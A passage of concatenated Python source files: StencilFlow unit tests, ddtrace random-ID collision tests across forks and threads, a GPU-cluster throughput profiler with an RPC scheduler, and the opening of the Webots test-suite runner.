self.assertFalse(queue.try_dequeue())
# enqueue, into non-full list, check return value
self.assertTrue(queue.try_enqueue(1.0))
# check size
self.assertTrue(queue.is_full())
# enqueue into full queue, check return value
self.assertFalse(queue.try_enqueue(1.0), 2.0)
def test_peek(self):
# init
queue = BoundedQueue(name="test", maxsize=2, collection=[1.0, 2.0])
# check value at index 0
self.assertEqual(queue.peek(0), 1.0)
# check value at index 1
self.assertEqual(queue.peek(1), 2.0)
# check value at last location
self.assertEqual(queue.try_peek_last(), 2.0)
# empty queue
queue.dequeue()
queue.dequeue()
# peek on empty queue, check return value
self.assertFalse(queue.try_peek_last())
from stencilflow.calculator import Calculator
from numpy import cos
class CalculatorTest(unittest.TestCase):
def test_calc(self):
# init vars
variables = dict()
variables["a"] = 7.0
variables["b"] = 2.0
# init calc
computation = "cos(a + b) if (a > b) else (a + 5) * b"
calculator = Calculator()
# do manual calculation and compare result
result = cos(variables["a"] + variables["b"]) if (variables["a"] > variables["b"]) else (variables["a"] + 5) * \
variables["b"]
self.assertEqual(calculator.eval_expr(variables, computation), result)
class RunProgramTest(unittest.TestCase):
def test(self):
pass # not a general test case, since dace and intel fgpa opencl sdk has to be installed and configured
import stencilflow.helper as helper
class HelperTest(unittest.TestCase):
def test(self):
# check max_dict_entry_key
self.assertEqual(
helper.max_dict_entry_key({
"a": [1, 0, 0],
"b": [0, 1, 0],
"c": [0, 0, 1]
}), "a")
# check list_add_cwise
self.assertEqual(helper.list_add_cwise([1, 2, 3], [3, 2, 1]), [4, 4, 4])
# check list_subtract_cwise
self.assertEqual(helper.list_subtract_cwise([1, 2, 3], [1, 2, 3]),
[0, 0, 0])
# check dim_to_abs_val
self.assertEqual(helper.dim_to_abs_val([3, 2, 1], [10, 10, 10]), 321)
# check convert_3d_to_1d
self.assertEqual(
helper.convert_3d_to_1d(dimensions=[10, 10, 10], index=[3, 2, 1]),
321)
# check load_array
self.assertListEqual(
list(
helper.load_array({
"data":
os.path.join(os.path.dirname(__file__), "stencils",
"helper_test.csv"),
"data_type":
helper.str_to_dtype("float64")
})), [7.0, 7.0])
self.assertListEqual(
list(
helper.load_array({
"data":
os.path.join(os.path.dirname(__file__), "stencils",
"helper_test.dat"),
"data_type":
helper.str_to_dtype("float64")
})), [7.0, 7.0])
# check save_array / load_array
out_data = np.array([1.0, 2.0, 3.0])
file = {"data": "test.dat", "data_type": helper.str_to_dtype("float64")}
helper.save_array(out_data, file["data"])
in_data = helper.load_array(file)
self.assertTrue(helper.arrays_are_equal(out_data, in_data))
os.remove(file["data"])
# check unique
not_unique = [1.0, 2.0, 1.0]
self.assertListEqual(sorted(helper.unique(not_unique)), [1.0, 2.0])
from stencilflow.log_level import LogLevel
import numpy as np
from stencilflow import run_program
def _return_result(queue, *args, **kwargs):
ret = run_program(*args, **kwargs)
queue.put(ret)
def _run_program(*args, **kwargs):
# We run each kernel with multiprocessing, because the Altera environment
# does not seem to properly tear down the environment when destroyed.
# This way, each kernel is run in a separate process, so that it is run
# with a clean environment.
queue = mp.Queue()
p = mp.Process(target=_return_result, args=(queue, ) + args, kwargs=kwargs)
p.start()
p.join()
return queue.get()
class ProgramTest(unittest.TestCase):
def test_and_simulate(self):
test_directory = os.path.join(os.path.dirname(__file__), "stencils")
for stencil_file in [
"simulator", "simulator2", "simulator3", "simulator4",
"simulator5", "simulator6", "simulator8", "simulator9",
"simulator10", "simulator11"
]:
print("Simulating and emulating program {}...".format(stencil_file))
stencil_file = os.path.join(test_directory, stencil_file + ".json")
_run_program(
stencil_file,
"emulation",
compare_to_reference=True,
# TODO: Simulation is broken for 2D
run_simulation=False,
# run_simulation=True,
log_level=LogLevel.BASIC,
input_directory=os.path.abspath(test_directory))
def test_program(self):
test_directory = os.path.join(os.path.dirname(__file__), "stencils")
for stencil_file in [
"varying_dimensionality",
"jacobi2d_128x128",
"jacobi2d_128x128_8vec",
"jacobi3d_32x32x32_8itr",
"jacobi3d_32x32x32_8itr_4vec",
]:
print("Testing program {}...".format(stencil_file))
stencil_file = os.path.join(test_directory, stencil_file + ".json")
_run_program(stencil_file,
"emulation",
compare_to_reference=True,
run_simulation=False,
log_level=LogLevel.NO_LOG,
input_directory=os.path.abspath(test_directory))
if __name__ == '__main__':
"""
Run all unit tests.
"""
try:
unittest.main()
except SystemExit as ex:
print('\n', flush=True)
# Skip all teardown to avoid crashes affecting exit code
os._exit(ex.code)
|
test_rand.py
|
from itertools import chain
import multiprocessing as mp
try:
from multiprocessing import SimpleQueue as MPQueue
except ImportError:
from multiprocessing.queues import SimpleQueue as MPQueue
import os
import threading
from ddtrace import Span
from ddtrace import tracer
from ddtrace.internal import _rand
from ddtrace.internal.compat import PYTHON_VERSION_INFO
from ddtrace.internal.compat import Queue
def test_random():
m = set()
for i in range(0, 2 ** 16):
n = _rand.rand64bits()
assert 0 <= n <= 2 ** 64 - 1
assert n not in m
m.add(n)
def test_fork_no_pid_check():
q = MPQueue()
pid = os.fork()
# Generate random numbers in the parent and child processes after forking.
# The child sends back their numbers to the parent where we check to see
# if we get collisions or not.
if pid > 0:
# parent
rns = {_rand.rand64bits(check_pid=False) for _ in range(100)}
child_rns = q.get()
if PYTHON_VERSION_INFO >= (3, 7):
# Python 3.7+ have fork hooks which should be used
# Hence we should not get any collisions
assert rns & child_rns == set()
else:
# Python < 3.7 we don't have any mechanism (other than the pid
# check) to reseed on so we expect there to be collisions.
assert rns == child_rns
else:
# child
try:
rngs = {_rand.rand64bits(check_pid=False) for _ in range(100)}
q.put(rngs)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_fork_pid_check():
q = MPQueue()
pid = os.fork()
# Generate random numbers in the parent and child processes after forking.
# The child sends back their numbers to the parent where we check to see
# if we get collisions or not.
if pid > 0:
# parent
rns = {_rand.rand64bits(check_pid=True) for _ in range(100)}
child_rns = q.get()
if PYTHON_VERSION_INFO >= (3, 7):
# Python 3.7+ have fork hooks which should be used
# Hence we should not get any collisions
assert rns & child_rns == set()
else:
# Python < 3.7 we have the pid check so there also
# should not be any collisions.
assert rns & child_rns == set()
else:
# child
try:
rngs = {_rand.rand64bits(check_pid=True) for _ in range(100)}
q.put(rngs)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_multiprocess():
q = MPQueue()
def target(q):
q.put([_rand.rand64bits() for _ in range(100)])
ps = [mp.Process(target=target, args=(q,)) for _ in range(30)]
for p in ps:
p.start()
for p in ps:
p.join()
ids_list = [_rand.rand64bits() for _ in range(1000)]
ids = set(ids_list)
assert len(ids_list) == len(ids), "Collisions found in ids"
while not q.empty():
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids_list) == len(child_ids), "Collisions found in subprocess ids"
assert ids & child_ids == set()
ids = ids | child_ids # accumulate the ids
def test_threadsafe():
# Check that the PRNG is thread-safe.
# This obviously won't guarantee thread safety, but it's something
# at least.
# To provide some validation of this method I wrote a slow, unsafe RNG:
#
# state = 4101842887655102017
#
# def bad_random():
# global state
# state ^= state >> 21
# state ^= state << 35
# state ^= state >> 4
# return state * 2685821657736338717
#
# which consistently fails this test.
q = Queue()
def _target():
# Generate a bunch of numbers to try to maximize the chance that
# two threads will be calling rand64bits at the same time.
rngs = [_rand.rand64bits() for _ in range(200000)]
q.put(rngs)
ts = [threading.Thread(target=_target) for _ in range(5)]
for t in ts:
t.start()
for t in ts:
t.join()
ids = set()
while not q.empty():
new_ids_list = q.get()
new_ids = set(new_ids_list)
assert len(new_ids) == len(new_ids_list), "Collision found in ids"
assert ids & new_ids == set()
ids = ids | new_ids
assert len(ids) > 0
def test_tracer_usage_fork():
q = MPQueue()
pid = os.fork()
# Similar test to test_fork() above except we use the tracer API.
# In this case we expect to never have collisions.
if pid > 0:
# parent
parent_ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)])
)
parent_ids = set(parent_ids_list)
assert len(parent_ids) == len(parent_ids_list), "Collisions found in parent process ids"
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in child process ids"
assert parent_ids & child_ids == set()
else:
# child
try:
child_ids = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)])
)
q.put(child_ids)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_tracer_usage_multiprocess():
q = MPQueue()
# Similar to test_multiprocess(), ensures that no collisions are
# generated between parent and child processes while using
# multiprocessing.
# Note that we have to be wary of the size of the underlying
# pipe in the queue: https://bugs.python.org/msg143081
def target(q):
ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(10)])
)
q.put(ids_list)
ps = [mp.Process(target=target, args=(q,)) for _ in range(30)]
for p in ps:
p.start()
for p in ps:
p.join()
ids_list = list(chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)]))
ids = set(ids_list)
assert len(ids) == len(ids_list), "Collisions found in ids"
while not q.empty():
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in subprocess ids"
assert ids & child_ids == set()
ids = ids | child_ids # accumulate the ids
def test_span_api_fork():
q = MPQueue()
pid = os.fork()
if pid > 0:
# parent
parent_ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [Span(None, None) for _ in range(100)])
)
parent_ids = set(parent_ids_list)
assert len(parent_ids) == len(parent_ids_list), "Collisions found in parent process ids"
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in child process ids"
assert parent_ids & child_ids == set()
else:
# child
try:
child_ids = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [Span(None, None) for _ in range(100)])
)
q.put(child_ids)
finally:
os._exit(0)
|
measure_throughput.py
|
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
import argparse
import copy
import datetime
import json
import queue
import threading
import time
from job_id_pair import JobIdPair
from job_table import JobTable
from runtime.rpc import scheduler_server, scheduler_client
import utils
BASE_DISTRIBUTED_LEASE_STEPS = 150
SERVER_PORT = 50060
INFINITY = 1000000
MULTI_GPU_JOB_TYPES = ['ResNet-18', 'ResNet-50', 'Transformer', 'LM']
class Profiler:
def __init__(self, num_workers, measurement_time, log_file=None):
# Profiler parameters.
self._num_workers = num_workers
self._measurement_time = measurement_time
self._log_file = log_file
# Job metadata.
self._job_id_counter = 0
self._job_id_to_job_type = {}
self._throughputs = {}
self._scale_factors = {}
self._completed_steps = {}
self._max_steps = {}
self._elapsed_time = {}
self._lease_update_requests = {}
self._num_throughput_updates = {}
# Worker metadata.
self._cluster_spec = {}
self._worker_id_counter = 0
self._worker_connections = {}
self._worker_id_to_worker_type = {}
self._worker_type_to_worker_ids = {}
self._worker_addrs = {}
self._worker_queue = queue.Queue()
self._all_rpc_clients = []
# Synchronization lock.
self._lock = threading.Lock()
# Logging thread setup.
self._write_queue = queue.Queue()
self._logging_thread = threading.Thread(target=self._print_logs)
self._logging_thread.daemon = True
self._logging_thread.start()
# Server thread setup.
callbacks = {
'RegisterWorker': self._register_worker_callback,
'Done': self._done_callback,
'UpdateLease': self._update_lease_callback,
}
self.server_thread = threading.Thread(
target=scheduler_server.serve,
args=(SERVER_PORT, callbacks, self._write_queue))
self.server_thread.daemon = True
self.server_thread.start()
"""
=====================================================================
Utility functions.
=====================================================================
"""
def _print_logs(self):
"""Print logging information."""
while True:
output = self._write_queue.get()
if self._log_file is not None:
with open(self._log_file, 'a') as f:
f.write('[%s] %s' % (str(datetime.datetime.now()),
output))
print('[%s] %s' % (str(datetime.datetime.now()),
output))
def _initialize_throughputs(self, worker_type=None, job_type=None):
"""Initialize throughputs data structure."""
if worker_type is not None:
self._throughputs[worker_type] = {}
for job_description in JobTable:
job_type = job_description.model
self._throughputs[worker_type][job_type] = {}
elif job_type is not None:
for worker_type in self._throughputs:
self._throughputs[worker_type][job_type] = {}
def _initialize_completed_steps_and_elapsed_time(self, job_id=None,
worker_type=None):
if job_id is not None:
assert not job_id.is_pair()
self._completed_steps[job_id] = {}
self._elapsed_time[job_id] = {}
for worker_type in self._cluster_spec:
self._completed_steps[job_id][worker_type] = 0
self._elapsed_time[job_id][worker_type] = 0.0
elif worker_type is not None:
for job_id in self._completed_steps:
self._completed_steps[job_id][worker_type] = 0
self._elapsed_time[job_id][worker_type] = 0.0
def _initialize_task(self, job_descriptions, scale_factor=1):
"""Initialize a task to submit to the worker."""
task = []
for job_description in job_descriptions:
with self._lock:
job_id = JobIdPair(self._job_id_counter, None)
self._job_id_counter += 1
job_type = job_description.model
if scale_factor > 1:
job_type += ' (scale factor %d)' % (scale_factor)
self._initialize_throughputs(job_type=job_type)
self._initialize_completed_steps_and_elapsed_time(
job_id=job_id)
self._max_steps[job_id] = {}
self._job_id_to_job_type[job_id] = job_type
self._scale_factors[job_id] = scale_factor
task.append([job_id, job_description.command,
job_description.needs_data_dir,
job_description.num_steps_arg,
INFINITY])
return task
def _can_be_run_multi_gpu(self, job_type):
"""Returns True if the job type supports distributed execution."""
for multi_gpu_job_type in MULTI_GPU_JOB_TYPES:
if multi_gpu_job_type in job_type:
return True
return False
def _initialize_per_worker_type_task_queues(self, isolated,
packing, distributed):
"""Initializes the task queues for every worker type."""
per_worker_type_task_queues = {}
for worker_type in self._cluster_spec:
per_worker_type_task_queues[worker_type] = queue.Queue()
scale_factor = 1
while scale_factor <= max(self._cluster_spec.values()):
if isolated:
for worker_type in per_worker_type_task_queues:
if scale_factor > self._cluster_spec[worker_type]:
continue
for i in range(len(JobTable)):
job_type = JobTable[i].model
if (scale_factor > 1 and
not self._can_be_run_multi_gpu(job_type)):
continue
task = self._initialize_task(
[JobTable[i]], scale_factor=scale_factor)
per_worker_type_task_queues[worker_type].put(
(task, scale_factor))
# NOTE: We do not profile distributed + packed jobs because the
# performance dropoff is too significant.
if packing and scale_factor == 1:
for worker_type in per_worker_type_task_queues:
for i in range(len(JobTable)):
job_type = JobTable[i].model
for j in range(i, len(JobTable)):
job_type = JobTable[j].model
task = self._initialize_task(
[JobTable[i], JobTable[j]],
scale_factor=scale_factor)
per_worker_type_task_queues[worker_type].put(
(task, scale_factor))
if distributed:
scale_factor *= 2
else:
break
return per_worker_type_task_queues
def _wait_for_workers(self):
"""Wait for the expected number of workers to register."""
while True:
with self._lock:
num_workers = len(self._worker_connections.keys())
if num_workers < self._num_workers:
time.sleep(5)
else:
break
def _get_job_types_from_job_id(self, job_id):
"""Returns a list of the job types associated with the job ID."""
job_types = []
if job_id.is_pair():
for single_job_id in job_id.singletons():
job_types.append(self._job_id_to_job_type[single_job_id])
else:
job_types.append(self._job_id_to_job_type[job_id])
job_types.append(None)
return job_types
def _reset_workers(self):
"""Sends a reset message to all workers."""
for rpc_client in self._all_rpc_clients:
rpc_client.reset()
def _shutdown_workers(self):
"""Sends a shutdown message to all workers."""
for rpc_client in self._all_rpc_clients:
rpc_client.shutdown()
"""
=====================================================================
RPC callbacks.
=====================================================================
"""
def _register_worker_callback(self, worker_type, num_gpus, ip_addr, port):
"""Registers a new worker."""
rpc_client = scheduler_client.SchedulerRpcClient(ip_addr, port)
self._all_rpc_clients.append(rpc_client)
per_worker_ids = []
with self._lock:
if worker_type not in self._cluster_spec:
self._cluster_spec[worker_type] = 0
self._throughputs[worker_type] = {}
self._worker_type_to_worker_ids[worker_type] = []
self._initialize_throughputs(worker_type=worker_type)
self._initialize_completed_steps_and_elapsed_time(
worker_type=worker_type)
self._cluster_spec[worker_type] += num_gpus
for i in range(num_gpus):
worker_id = self._worker_id_counter
self._worker_id_counter += 1
per_worker_ids.append(worker_id)
self._worker_id_to_worker_type[worker_id] = worker_type
self._worker_type_to_worker_ids[worker_type].append(worker_id)
self._worker_addrs[worker_id] = (ip_addr, port)
self._worker_connections[worker_id] = rpc_client
self._write_queue.put(
'Registered worker %d (%s) at %s:%s' % (worker_id,
worker_type,
ip_addr,
port))
return (per_worker_ids, self._measurement_time)
def _update_lease_callback(self, job_id, worker_id, steps, duration,
max_steps, max_duration):
scale_factor = self._scale_factors[job_id]
if steps == 0 or duration == 0:
return (INFINITY, self._measurement_time)
elif scale_factor == 1:
return (max_steps, max_duration)
else:
worker_type = self._worker_id_to_worker_type[worker_id]
with self._lock:
update_id = len(self._lease_update_requests[job_id])
self._lease_update_requests[job_id].append((steps, duration,
max_steps,
max_duration))
if update_id == 0:
if (job_id in self._max_steps and
worker_type in self._max_steps[job_id]):
del self._max_steps[job_id][worker_type]
# The first worker to request a lease update computes the new
# lease for all workers.
if update_id == 0:
with self._lock:
remaining_time = \
(self._measurement_time -
duration % self._measurement_time)
throughput = steps / duration
remaining_steps = max(1, int(remaining_time * throughput))
max_completed_steps = \
max([request[0] for request in \
self._lease_update_requests[job_id]])
self._max_steps[job_id][worker_type] = \
max_completed_steps + remaining_steps
return (self._max_steps[job_id][worker_type], INFINITY)
else:
# Wait for the first update to complete.
while True:
with self._lock:
if worker_type in self._max_steps[job_id]:
break
# TODO: Sleep for less time?
time.sleep(1)
return (self._max_steps[job_id][worker_type], INFINITY)
def _done_callback(self, job_id, worker_id, all_num_steps,
all_execution_times):
"""Updates the throughput of the associated job(s)."""
with self._lock:
worker_type = self._worker_id_to_worker_type[worker_id]
job_types = self._get_job_types_from_job_id(job_id)
all_throughputs = self._throughputs[worker_type]
scale_factor = self._scale_factors[job_id.singletons()[0]]
job_throughputs = []
for (num_steps, execution_time) in \
zip(all_num_steps, all_execution_times):
if min(all_num_steps) <= 0 or min(all_execution_times) <= 0:
job_throughputs.append(0)
else:
job_throughputs.append(num_steps / execution_time)
# Initialize/reset throughputs if necessary.
job_failed = min(all_execution_times) <= 0
if job_failed or job_types[1] not in all_throughputs[job_types[0]]:
if job_id.is_pair():
all_throughputs[job_types[0]][job_types[1]] = [0.0, 0.0]
all_throughputs[job_types[1]][job_types[0]] = [0.0, 0.0]
else:
all_throughputs[job_types[0]][job_types[1]] = 0.0
# Update throughputs.
if job_failed:
self._num_throughput_updates[job_id] = scale_factor
else:
if job_id.is_pair():
for i in range(len(job_throughputs)):
throughput = job_throughputs[i]
if job_types[0] == job_types[1]:
throughput /= 2.0
all_throughputs[job_types[0]][job_types[1]][i] += \
throughput
all_throughputs[job_types[1]][job_types[0]][1-i] += \
throughput
else:
all_throughputs[job_types[0]][job_types[1]]+= \
job_throughputs[0]
self._num_throughput_updates[job_id] += 1
# Print logging information.
if self._num_throughput_updates[job_id] == scale_factor:
updated_throughputs = \
all_throughputs[job_types[0]][job_types[1]]
throughputs_str = str(updated_throughputs)
if job_id.is_pair():
self._write_queue.put(
'Throughputs for %s on %s: %s' % (str(job_types),
worker_type,
throughputs_str))
else:
assert(job_types[1] is None)
self._write_queue.put(
'Throughput for %s on %s: %s' % (job_types[0],
worker_type,
throughputs_str))
self._worker_queue.get()
"""
=====================================================================
Public API functions.
=====================================================================
"""
def profile(self, isolated, packed, distributed):
"""Profiles the job types in the desired configuration(s)."""
self._wait_for_workers()
per_worker_type_task_queues = \
self._initialize_per_worker_type_task_queues(isolated,
packed,
distributed)
done = False
while not done:
num_tasks = 0
for worker_type in per_worker_type_task_queues:
num_tasks += per_worker_type_task_queues[worker_type].qsize()
assert(num_tasks > 0)
# Schedule tasks for each worker type.
for worker_type in self._cluster_spec:
worker_ids = self._worker_type_to_worker_ids[worker_type]
worker_id_ptr = 0
num_remaining_worker_ids = len(worker_ids)
unschedulable_queue = queue.Queue()
# Continue scheduling tasks until there are no remaining tasks
# or no remaining workers.
while (num_remaining_worker_ids > 0 and
not per_worker_type_task_queues[worker_type].empty()):
(task, scale_factor) = \
per_worker_type_task_queues[worker_type].get()
# If there are not enough remaining workers to
# schedule this task, try again later.
if scale_factor > num_remaining_worker_ids:
unschedulable_queue.put((task, scale_factor))
continue
if len(task) > 1:
merged_job_id = JobIdPair(task[0][0][0],
task[1][0][0])
else:
merged_job_id = task[0][0]
self._num_throughput_updates[merged_job_id] = 0
# Schedule the task.
for i in range(worker_id_ptr, worker_id_ptr+scale_factor):
worker_id = worker_ids[i]
for j, job_description in enumerate(task):
job_id = job_description[0]
# Reset any existing lease information.
self._lease_update_requests[job_id] = []
if worker_type in self._max_steps[job_id]:
del self._max_steps[job_id][worker_type]
# Log task.
job_type = self._job_id_to_job_type[job_id]
self._write_queue.put(
'Scheduling job %s (%s) on '
'worker %d (%s)' % (job_id,
job_type,
worker_id,
worker_type))
# Add necessary arguments for distributed jobs.
if scale_factor > 1:
if i == worker_id_ptr:
if j == 0:
base_commands = []
base_commands.append(job_description[1])
master_id = worker_ids[worker_id_ptr]
(master_addr, master_port) = \
self._worker_addrs[master_id]
offset_master_port = \
master_port + 1 + master_id + j
world_size = scale_factor
rank = i - worker_id_ptr
command = ('%s --master_addr %s '
'--master_port %d '
'--world_size %d '
'--rank %d') % (base_commands[j],
master_addr,
offset_master_port,
world_size,
rank)
task[j][1] = command
self._worker_queue.put(worker_id)
self._worker_connections[worker_id].run(task,
worker_id)
worker_id_ptr += scale_factor
num_remaining_worker_ids -= scale_factor
# Move all previously un-schedulable tasks back to the queue.
while not unschedulable_queue.empty():
(task, scale_factor) = unschedulable_queue.get()
per_worker_type_task_queues[worker_type].put(
(task, scale_factor))
while not self._worker_queue.empty():
time.sleep(2)
done = True
for worker_type in per_worker_type_task_queues:
if not per_worker_type_task_queues[worker_type].empty():
done = False
break
self._reset_workers()
self._shutdown_workers()
def output(self, output_file):
"""Outputs the throughputs to a file in JSON format."""
# Make the output throughput keys a tuple of (model, scale_factor).
throughputs = {}
for worker_type in self._throughputs:
throughputs[worker_type] = {}
for job_type in self._throughputs[worker_type]:
key = str(utils.parse_job_type_str(job_type))
throughputs[worker_type][key] = {}
for other_job_type in self._throughputs[worker_type][job_type]:
if other_job_type is None:
other_key = None
else:
other_key = str(utils.parse_job_type_str(other_job_type))
throughputs[worker_type][key][other_key] =\
self._throughputs[worker_type][job_type][other_job_type]
with open(output_file, 'w') as f:
f.write(json.dumps(throughputs, indent=4))
def main(args):
if not args.isolated and not args.packed:
raise ValueError('At least one of "--isolated" or "--packed"'
'must be set')
profiler = Profiler(args.num_workers, args.measurement_time)
profiler.profile(args.isolated, args.packed, args.distributed)
profiler.output(args.output_file)
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Measure throughputs')
parser.add_argument('-n', '--num_workers', type=int, required=True,
help='Number of workers')
parser.add_argument('-m', '--measurement_time', type=int, default=150,
help='Time per measurement in seconds')
parser.add_argument('-l', '--log_file', type=str, default=None,
help='Log file')
parser.add_argument('-i', '--isolated', action='store_true',
help='Measure isolated throughputs')
parser.add_argument('-p', '--packed', action='store_true',
help='Measure packed throughputs')
parser.add_argument('-d', '--distributed', action='store_true',
help='Measure distributed throughputs')
parser.add_argument('-o', '--output_file', type=str, required=True,
help='JSON output file for throughputs')
args = parser.parse_args()
main(args)
|
test_suite.py
|
#!/usr/bin/env python
# Copyright 1996-2019 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test suite."""
import sys
import os
import shutil
import platform
import datetime
import getpass
import glob
import subprocess
import threading
import time
import multiprocessing
from command import Command
# monitor failures
failures = 0
# parse arguments
filesArguments = []
nomakeOption = False
ansiEscape = True
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
if arg == '--nomake':
nomakeOption = True
elif arg == '--no-ansi-escape':
ansiEscape = False
elif os.path.exists(arg):
filesArguments.append(arg)
else:
raise RuntimeError('Unknown option "' + arg + '"')
testGroups = ['api', 'physics', 'protos', 'parser', 'rendering']
# global files
testsFolderPath = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep
outputFilename = testsFolderPath + 'output.txt'
defaultProjectPath = testsFolderPath + 'default' + os.sep
supervisorControllerName = 'test_suite_supervisor'
protoFileNames = ['TestSuiteSupervisor.proto', 'TestSuiteEmitter.proto']
tempWorldCounterFilename = testsFolderPath + 'world_counter.txt'
webotsStdOutFilename = testsFolderPath + 'webots_stdout.txt'
webotsStdErrFilename = testsFolderPath + 'webots_stderr.txt'
# Webots setup (cf. setupWebots() below)
webotsFullPath = ''
webotsVersion = ''
def setupWebots():
"""Find webots binary thanks to WEBOTS_HOME."""
os.putenv('WEBOTS_TEST_SUITE', 'TRUE')
os.putenv('WEBOTS_EMPTY_PROJECT_PATH', defaultProjectPath)
global webotsFullPath
global webotsVersion
global webotsSysInfo
if sys.platform == 'win32':
webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + 'msys64' + \
os.sep + 'mingw64' + os.sep + 'bin' + os.sep + 'webots.exe'
else:
webotsBinary = 'webots'
if 'WEBOTS_HOME' in os.environ:
webotsFullPath = os.environ['WEBOTS_HOME'] + os.sep + webotsBinary
else:
webotsFullPath = '..' + os.sep + '..' + os.sep + webotsBinary
if not os.path.isfile(webotsFullPath):
print('Error: ' + webotsBinary + ' binary not found')
if sys.platform == 'win32':
sys.stdout.flush()
sys.exit(1)
webotsFullPath = os.path.normpath(webotsFullPath)
command = Command(webotsFullPath + ' --version')
command.run()
if command.returncode != 0:
raise RuntimeError('Error when getting the Webots version')
webotsVersion = command.output.replace('\n', ' ').split(' ')[2].split('.')
command = Command(webotsFullPath + ' --sysinfo')
command.run()
if command.returncode != 0:
raise RuntimeError('Error when getting the Webots information of the system')
webotsSysInfo = command.output.split('\n')
def findFirstWorldFilename(worldsFilename):
"""Get the first world file name."""
file = open(worldsFilename)
worldFilename = file.readline().strip()
file.close()
return worldFilename
def resetIndexFile(indexFilename):
"""Create the index file."""
file = open(indexFilename, 'w')
file.write('0\n')
file.close()
def formatString(s):
"""Add a predefined number of spaces after the ':' character."""
try:
index = s.index(': ')
s0 = '{:<20}'.format(s[0:index])
s0 += s[index:]
return s0
except ValueError: # can be thrown by string.index()
return s
def resetOutputFile():
"""Create the output file."""
file = open(outputFilename, 'w')
file.write(formatString('Webots binary: ' + webotsFullPath) + '\n')
file.write(formatString('Webots version: ' + str(webotsVersion)) + '\n')
file.write(formatString(
'Operating System: ' + platform.platform() +
' [' + platform.machine() + '] ' + platform.processor() +
' (' + platform.node() + ')') + '\n'
)
file.write(formatString('Date: ' + datetime.datetime.now().ctime()) + '\n')
file.write(formatString('Tester: ' + getpass.getuser()) + '\n')
for line in webotsSysInfo:
file.write(formatString(line) + '\n')
file.close()
def appendToOutputFile(txt):
"""Append txt to output file."""
file = open(outputFilename, 'a')
file.write(txt)
file.close()
def executeMake():
"""Execute 'make release' to ensure every controller/plugin is compiled."""
curdir = os.getcwd()
os.chdir(os.path.join(os.environ['WEBOTS_HOME'], 'tests'))
command = Command('make release -j%d' % multiprocessing.cpu_count())
command.run(silent=False)
os.chdir(curdir)
if command.returncode != 0:
raise RuntimeError('Error when executing the Make command')
def generateWorldsList(groupName, worldsFilename):
"""Generate the list of worlds to run."""
f = open(worldsFilename, 'w')
worldsCount = 0
# generate the list from the arguments
if filesArguments:
for file in filesArguments:
if file.startswith(groupName):
f.write(file + '\n')
worldsCount = len(filesArguments)
# generate the list from 'ls worlds/*.wbt'
else:
filenames = glob.glob(testsFolderPath + groupName + os.sep + 'worlds' + os.sep + '*.wbt')
# remove the generic name
for filename in filenames:
if filename.endswith('test_suite'):
filenames.remove(filename)
# alphabetical order
filenames.sort()
# to file
for filename in filenames:
# speaker test not working on travis because of missing sound drivers
if not filename.endswith('_temp.wbt') and not ('TRAVIS' in os.environ and filename.endswith('speaker.wbt')):
f.write(filename + '\n')
worldsCount += 1
f.close()
return worldsCount
def monitorOutputFile(finalMessage):
"""Display the output file on the console."""
global monitorOutputCommand
monitorOutputCommand = Command('tail -f ' + outputFilename, ansiEscape)
monitorOutputCommand.run(expectedString=finalMessage, silent=False)
if not nomakeOption:
executeMake()
setupWebots()
resetOutputFile()
finalMessage = 'Test suite complete'
thread = threading.Thread(target=monitorOutputFile, args=[finalMessage])
thread.start()
webotsArguments = '--mode=fast --stdout --stderr --minimize --batch'
if sys.platform != 'win32':
webotsArguments += ' --no-sandbox'
for groupName in testGroups:
testFailed = False
appendToOutputFile('\n### ' + groupName + ' test\n\n')
# clear stdout and stderr files
open(webotsStdErrFilename, 'w').close()
open(webotsStdOutFilename, 'w').close()
worldsFilename = testsFolderPath + groupName + os.sep + 'worlds.txt'
indexFilename = testsFolderPath + groupName + os.sep + 'worlds_index.txt'
# init temporary world counter file
tempFile = open(tempWorldCounterFilename, 'w')
tempFile.write('0')
tempFile.close()
supervisorTargetDirectory = testsFolderPath + groupName + os.sep + 'controllers' + os.sep + \
supervisorControllerName
if not os.path.exists(supervisorTargetDirectory):
os.makedirs(supervisorTargetDirectory)
shutil.copyfile(
defaultProjectPath + 'controllers' + os.sep +
supervisorControllerName + os.sep +
supervisorControllerName + '.py',
supervisorTargetDirectory + os.sep + supervisorControllerName + '.py'
)
# parser tests uses a slightly different Supervisor PROTO
protosTargetDirectory = testsFolderPath + groupName + os.sep + 'protos'
protosSourceDirectory = defaultProjectPath + 'protos' + os.sep
if not os.path.exists(protosTargetDirectory):
os.makedirs(protosTargetDirectory)
for protoFileName in protoFileNames:
